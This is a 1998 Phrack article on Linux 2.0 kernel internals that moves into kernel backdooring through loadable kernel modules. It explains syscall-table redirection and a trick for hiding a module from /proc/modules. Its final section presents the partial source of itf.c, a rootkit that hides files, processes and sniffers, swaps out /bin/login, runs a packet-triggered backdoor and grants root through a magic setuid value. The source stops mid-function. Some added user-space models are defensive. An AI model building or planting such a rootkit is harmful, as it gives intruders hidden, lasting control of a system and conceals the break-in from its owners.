Subject: [Phrack] Weakening the Linux Kernel
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 20
-------------------------[ Weakening the Linux Kernel
--------[ plaguez <dube0866@eurobretagne.fr>
----[ Preamble
The following applies to the Linux x86 2.0.x kernel series. It may also be
accurate for previous releases, but has not been tested. 2.1.x kernels
introduced a bunch of changes, most notably in the memory management routines,
and are not discussed here.
Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you
by plaguez and WSD.
----[ User space vs. Kernel space
Linux supports a number of architectures, however most of the code and
discussion in this article refers to the i386 version only.
Memory is divided into two parts: kernel space and user space. Kernel space
is defined in the GDT, and mapped to each process's address space. User
space is in the LDT and is local to each process. A given program can't
write to kernel memory even when it is mapped because it is not in the
same ring.
Typically, you cannot access user memory from the kernel either. However,
this is really easy to overcome. When we execute a system call, one
of the first things the kernel does is set ds and es up so that memory
references point to the kernel data segment. It then sets up fs so that
it points to the user data segment. If we want to use kernel memory
in a system call, all we should have to do is push fs, then set it to ds.
Of course, I have not actually tested this, so take it with a pound or
two of salt :).
Here are a few of the useful functions to use in kernel mode for transferring
data bytes to or from user memory:
#include <asm/segment.h>
get_user(ptr)
Gets the given byte, word, or long from user memory. This is a macro, and
it relies on the type of the argument to determine the number of bytes to
transfer. You then have to use typecasts wisely.
put_user(x, ptr)
This is the same as get_user(), but instead of reading, it writes the value
x to user memory at ptr.
memcpy_fromfs(void *to, const void *from,unsigned long n)
Copies n bytes from *from in user memory to *to in kernel memory.
memcpy_tofs(void *to, const void *from, unsigned long n)
Copies n bytes from *from in kernel memory to *to in user memory.
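To see how a macro like get_user() can pick the transfer size from the type
of its argument, here is a minimal user-space sketch. It is not the kernel's
implementation: model_fetch() and model_get_user() are hypothetical names, the
copy is an ordinary memory read rather than an access through %fs, and it
assumes GCC's __typeof__ extension.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the kernel helper: reads `size` bytes at ptr.
 * The real code would go through the %fs segment to reach user memory. */
static unsigned long model_fetch(const void *ptr, size_t size)
{
    switch (size) {
    case 1: { unsigned char v;  memcpy(&v, ptr, 1); return v; }
    case 2: { unsigned short v; memcpy(&v, ptr, 2); return v; }
    case 4: { unsigned int v;   memcpy(&v, ptr, 4); return v; }
    default: return 0;   /* sizes other than 1, 2 and 4 are not modelled */
    }
}

/* sizeof(*(ptr)) selects the width; the cast gives the result the
 * pointed-to type, which is why the caller's typecasts matter. */
#define model_get_user(ptr) \
    ((__typeof__(*(ptr)))model_fetch((ptr), sizeof(*(ptr))))
```

Passing an (unsigned char *) fetches one byte and passing an (unsigned int *)
fetches four, so casting the pointer is how the caller chooses the width.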
----[ System calls
Most libc function calls rely on underlying system calls, which are the
simplest kernel functions a user program can call. These system calls are
implemented in the kernel itself or in loadable kernel modules, which are
little chunks of dynamically linkable kernel code.
Like MS-DOS and many others, Linux system calls are implemented through a
multiplexor called with a given software interrupt. In Linux, this interrupt
is int 0x80. When the 'int 0x80' instruction is executed, control is given to
the kernel (or, more accurately, to the function _system_call()), and the
actual demultiplexing process occurs.
The _system_call() function works as follows:
First, all registers are saved and the content of the %eax register is checked
against the global system calls table, which enumerates all system calls and
their addresses. This table can be accessed with the extern void
*sys_call_table[] variable. A given number and memory address in this table
corresponds to each system call. System call numbers can be found in
/usr/include/sys/syscall.h. They are of the form SYS_systemcallname. If the
system call is not implemented, the corresponding cell in the sys_call_table
is 0, and an error is returned. Otherwise, the system call exists and the
corresponding entry in the table is the memory address of the system call code.
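#include <errno.h>
#include <stdio.h>

int sc(void)
{
    int ret;

    /* system call number 165 doesn't exist at this time. */
    __asm__ volatile ("movl $165, %%eax\n\t"
                      "int $0x80"
                      : "=a" (ret));
    return ret;    /* the kernel leaves its return value in %eax */
}

int main(void)
{
    errno = -sc();
    perror("test of invalid syscall");
    return 0;
}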
[root@plaguez kernel]# gcc no1.c
[root@plaguez kernel]# ./a.out
test of invalid syscall: Function not implemented
[root@plaguez kernel]# exit
Normally, control is then transferred to the actual system call, which performs
whatever you requested and returns. _system_call() then calls
_ret_from_sys_call() to check various stuff, and ultimately returns to user
memory.
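The table lookup described in this section can be modelled in user space. The
following is only a sketch under stated assumptions: the table size, the
model_ names and the single "add" entry are invented for illustration, and
nothing here touches the real sys_call_table.

```c
#include <errno.h>
#include <stddef.h>

#define MODEL_NR_SYSCALLS 8   /* hypothetical table size */

typedef long (*model_syscall_fn)(long, long, long);

/* Hypothetical "system call" number 1: returns the sum of two arguments. */
static long model_sys_add(long a, long b, long c)
{
    (void)c;
    return a + b;
}

/* Unimplemented entries stay NULL (0), as in the table described above. */
static model_syscall_fn model_sys_call_table[MODEL_NR_SYSCALLS] = {
    [1] = model_sys_add,
};

/* Model of the demultiplexer: nr plays the role of %eax. */
static long model_system_call(long nr, long a, long b, long c)
{
    if (nr < 0 || nr >= MODEL_NR_SYSCALLS || model_sys_call_table[nr] == NULL)
        return -ENOSYS;   /* "Function not implemented" */
    return model_sys_call_table[nr](a, b, c);
}
```

Calling model_system_call(165, 0, 0, 0) returns -ENOSYS, the same error the
test program above reports through perror().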
----[ libc wrappers
Programs rarely issue int $0x80 directly; instead they call libc functions,
many of which are thin wrappers around interrupt 0x80.
libc is actually the user space interface to kernel functions.
libc generally features the system calls using the _syscallX() macros, where X
is the number of parameters for the system call.
For example, the libc entry for write(2) would be implemented with a _syscall3
macro, since the actual write(2) prototype requires 3 parameters. Before
calling interrupt 0x80, the _syscallX macros load the system call number into
%eax and the arguments into registers (%ebx, %ecx, %edx, ...). Finally, when the
_system_call() (which is triggered with int $0x80) returns, the _syscallX()
macro will check for a negative return value (in %eax) and will set errno
accordingly.
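The return-value convention just described (a negative value in %eax becomes
a positive errno and a -1 return) can be sketched as a plain C function.
model_syscall_return() is a hypothetical name used only for this illustration;
the real logic lives inside the _syscallX() macros.

```c
#include <errno.h>

/* res is the raw value the kernel left in %eax. */
static long model_syscall_return(long res)
{
    if (res >= 0)
        return res;        /* success: pass the value through */
    errno = (int)-res;     /* failure: kernel returned -errno */
    return -1;
}
```

This is also why the earlier test program can write errno = -sc(): the raw
return value of an unimplemented call is -ENOSYS.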
Let's check another example with write(2) and see how it gets preprocessed.
main()
{
char *t = "this is a test.\n";
write(0, t, strlen(t));
}
[root@plaguez kernel]# exit
Note that the '4' in the write() function above matches the SYS_write
definition in /usr/include/sys/syscall.h.
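On a current system, the link between a wrapper and its system call number can
be observed with the generic syscall(2) function from libc. This is a hedged
sketch rather than the preprocessed output discussed above: write_via_syscall()
is a hypothetical helper, and the numeric value of SYS_write depends on the
architecture (4 on i386, different elsewhere).

```c
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: writes the string s to fd by system call number,
 * bypassing the write(2) wrapper but not libc's errno handling. */
static long write_via_syscall(int fd, const char *s)
{
    return syscall(SYS_write, fd, s, strlen(s));
}
```

For example, write_via_syscall(1, "this is a test.\n") sends the string to
standard output and returns the number of bytes written.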
----[ Writing your own system calls.
There are a few ways to create your own system calls. For example, you could
modify the kernel sources and append your own code. A far easier way, however,
would be to write a loadable kernel module.
A loadable kernel module is nothing more than an object file containing code
that will be dynamically linked into the kernel when it is needed.
The main purposes of this feature are to have a small kernel, and to load a
given driver when it is needed with the insmod(1) command. It's also easier
to write a lkm than to write code in the kernel source tree.
With lkm, adding or modifying system calls is just a matter of modifying the
sys_call_table array, as we'll see in the example below.
----[ Writing a lkm
A lkm is easily written in C. It contains a chunk of #defines, the body of the
code, an initialization function called init_module(), and an unload function
called cleanup_module(). The init_module() and cleanup_module() functions
will be called at module loading and deleting. Also, don't forget that
modules are kernel code, and though they are easy to write, any programming
mistake can have quite serious results.
Check the mandatory #defines (#define MODULE, #define __KERNEL__) and
#includes (#include <linux/config.h> ...)
Also note that as our lkm will be running in kernel mode, we can't use libc
functions, but we can use system calls with the previously discussed
_syscallX() macros or call them directly using the pointers to functions
located in the sys_call_table array.
You would compile this module with 'gcc -c -O3 module.c' and insert it into
the kernel with 'insmod module.o' (optimization must be turned on).
As the title suggests, lkm can also be used to modify kernel code without
having to rebuild it entirely. For example, you could patch the write(2)
system call to hide portions of a given file. Seems like a good place for
backdoors, also: what would you do if you couldn't trust your own kernel?
----[ Kernel and system calls backdoors
The main idea behind this is pretty simple. We'll redirect those damn system
calls to our own system calls in a lkm, which will enable us to force the
kernel to react as we want it to. For example, we could hide a sniffer by
patching the IOCTL system call and masking the PROMISC bit. Lame but
efficient.
To modify a given system call, just add the definition of the extern void
*sys_call_table[] in your lkm, and have the init_module() function modify the
corresponding entry in the sys_call_table to point to your own code. The
modified call can then do whatever you wish it to, meaning that as all user
programs rely on those kernel calls, you'll have entire control of the system.
This point raises the fact that it can become very difficult to prevent
intruders from staying in the system when they've broken into it. Prevention
is still the best way to security, and hardening the Linux kernel is needed on
sensitive boxes.
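The redirection idea, and one way to notice it, can be modelled entirely in
user space with a table of function pointers. Everything below is an
assumption made for illustration: the model_ names, the table size and the
flag value are invented, and the check simply compares the table against a
known-good snapshot taken earlier.

```c
#include <stddef.h>

#define MODEL_NR_SYSCALLS  4        /* hypothetical table size */
#define MODEL_FLAG_PROMISC 0x100L   /* hypothetical flag bit */

typedef long (*model_fn)(long);

/* Hypothetical original call: reports interface flags with the bit set. */
static long model_sys_getflags(long dev)
{
    (void)dev;
    return 0x1143L;
}

static model_fn model_table[MODEL_NR_SYSCALLS] = { [1] = model_sys_getflags };
static model_fn model_saved;        /* the "old vector" */

/* Replacement: calls the original, then masks the flag from the result. */
static long model_filtered_getflags(long dev)
{
    return model_saved(dev) & ~MODEL_FLAG_PROMISC;
}

static void model_redirect(void)
{
    model_saved = model_table[1];
    model_table[1] = model_filtered_getflags;
}

static void model_restore(void)
{
    model_table[1] = model_saved;
}

/* Integrity check: number of entries that differ from the snapshot. */
static int model_count_modified(const model_fn *snapshot)
{
    int i, n = 0;

    for (i = 0; i < MODEL_NR_SYSCALLS; i++)
        if (model_table[i] != snapshot[i])
            n++;
    return n;
}
```

Callers see different results after model_redirect() without changing a line
of their own code, which is the point made above; the snapshot comparison only
helps if the snapshot was taken before the table was modified.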
----[ A few programming tricks
- Calling system calls within a lkm is pretty easy as long as you pass user
space arguments to the given system call. If you need to pass kernel space
arguments, you need to be sure to modify the fs register, or else
everything will fall on its face. It is just a matter of storing the
system call function in a "pointer to function" variable, and then using this
variable. For example:
- Hiding a module can be done in several ways. As Runar Jensen showed in
Bugtraq, you could strip /proc/modules on the fly, when a program tries to
read it. Unfortunately, this is somewhat difficult to implement and, as it
turns out, this is not a good solution since doing a
'dd if=/proc/modules bs=1' would show the module. We need to find another
solution. Solar Designer (and other nameless individuals) have a solution.
Since the module info list is not exported from the kernel, there is no direct
way to access it, except that this module info structure is used in
sys_init_module(), which calls our init_module()! Providing that gcc does not
fuck up the registers before entering our init_module(), it is possible to get
the register previously used for struct module *mp and then to get the address
of one of the items of this structure (which is a circular list btw). So, our
init_module() function will include something like that at its beginning:
int init_module()
{
register struct module *mp asm("%ebx"); // or whatever register it is in
*(char*)mp->name=0;
mp->size=0;
mp->ref=0;
...
}
Since the kernel does not show modules with no name and no references (=kernel
modules), ours won't be shown in /proc/modules.
----[ A practical example
Here is itf.c. The goal of this program is to demonstrate kernel backdooring
techniques using system call redirection. Once installed, it is very hard to
spot.
Its features include:
- stealth functions: once insmod'ed, itf will modify struct module *mp and
get_kernel_symbols(2) so it won't appear in /proc/modules or ksyms' outputs.
Also, the module cannot be unloaded.
- sniffer hider: itf will backdoor ioctl(2) so that the PROMISC flag will be
hidden. Note that you'll need to place the sniffer BEFORE insmod'ing itf.o,
because itf will trap a change in the PROMISC flag and will then stop hiding
it (otherwise you'd just have to do a ifconfig eth0 +promisc and you'd spot
the module...).
- file hider: itf will also patch the getdents(2) system calls, thus hiding
files containing a certain word in their filename.
- process hider: using the same technique as described above, itf will hide
/proc/PID directories using argv entries. Any process named with the magic
name will be hidden from the procfs tree.
- execve redirection: this implements Halflife's idea discussed in P51.
If a given program (notably /bin/login) is execve'd, itf will execve
another program instead. It uses tricks to overcome Linux memory management
limitations: brk(2) is used to increase the calling program's data segment
size, thus allowing us to allocate user memory while in kernel mode (remember
that most system calls wait for arguments in user memory, not kernel mem).
- socket recvfrom() backdoor: when a packet matching a given size and a given
string is received, a non-interactive program will be executed. Typical use
is a shell script (which will be hidden using the magic name) that opens
another port and waits there for shell commands.
- setuid() trojan: like Halflife's stuff. When a setuid() syscall with uid ==
magic number is done, the calling process will get uid = euid = gid = 0
<++> lkm_trojan.c
/*
* itf.c v0.8
* Linux Integrated Trojan Facility
* (c) plaguez 1997 -- dube0866@eurobretagne.fr
* This is mostly not fully tested code. Use at your own risk.
*
*
* compile with:
* gcc -c -O3 -fomit-frame-pointer itf.c
* Then:
* insmod itf
*
*
* Thanks to Halflife and Solar Designer for their help/ideas.
*
* Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial.
*
*
*/
/* Customization section
* - RECVEXEC is the full pathname of the program to be launched when a packet
* of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom().
* This program can be a shell script, but must be able to handle null **argv (I'm too lazy
* to write more than execve(RECVEXEC,NULL,NULL); :)
* - NEWEXEC is the name of the program that is executed instead of OLDEXEC
* when an execve() syscall occurs.
* - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID)
* is made (like Halflife's code)
* - files containing MAGICNAME in their full pathname will be invisible to
* a getdents() system call.
* - processes containing MAGICNAME in their process name will be hidden from
* the procfs tree.
*/
#define MAGICNAME "w00w00T$!"
#define MAGICUID 31337
#define OLDEXEC "/bin/login"
#define NEWEXEC "/.w00w00T$!/w00w00T$!login"
#define RECVEXEC "/.w00w00T$!/w00w00T$!recv"
#define MAGICSIZE sizeof(MAGICNAME)+10
/* old system calls vectors */
int (*o_getdents) (uint, struct dirent *, uint);
ssize_t(*o_readdir) (int, void *, size_t);
int (*o_setuid) (uid_t);
int (*o_execve) (const char *, const char *[], const char *[]);
int (*o_ioctl) (int, int, unsigned long);
int (*o_get_kernel_syms) (struct kernel_sym *);
ssize_t(*o_read) (int, void *, size_t);
int (*o_socketcall) (int, unsigned long *);
/* entry points to the brk(), fork() and exit() syscalls. */
static inline _syscall1(int, brk, void *, end_data_segment);
static inline _syscall0(int, fork);
static inline _syscall1(void, exit, int, status);
extern void *sys_call_table[];
extern struct proto tcp_prot;
int errno;
char mtroj[] = MAGICNAME;
int __NR_myexecve;
int promisc;
/*
* String-oriented functions
* (from user-space to kernel-space or invert)
*/
char *strncpy_fromfs(char *dest, const char *src, int n)
{
char *tmp = src;
int compt = 0;
do {
dest[compt++] = __get_user(tmp++, 1);
}
while ((dest[compt - 1] != '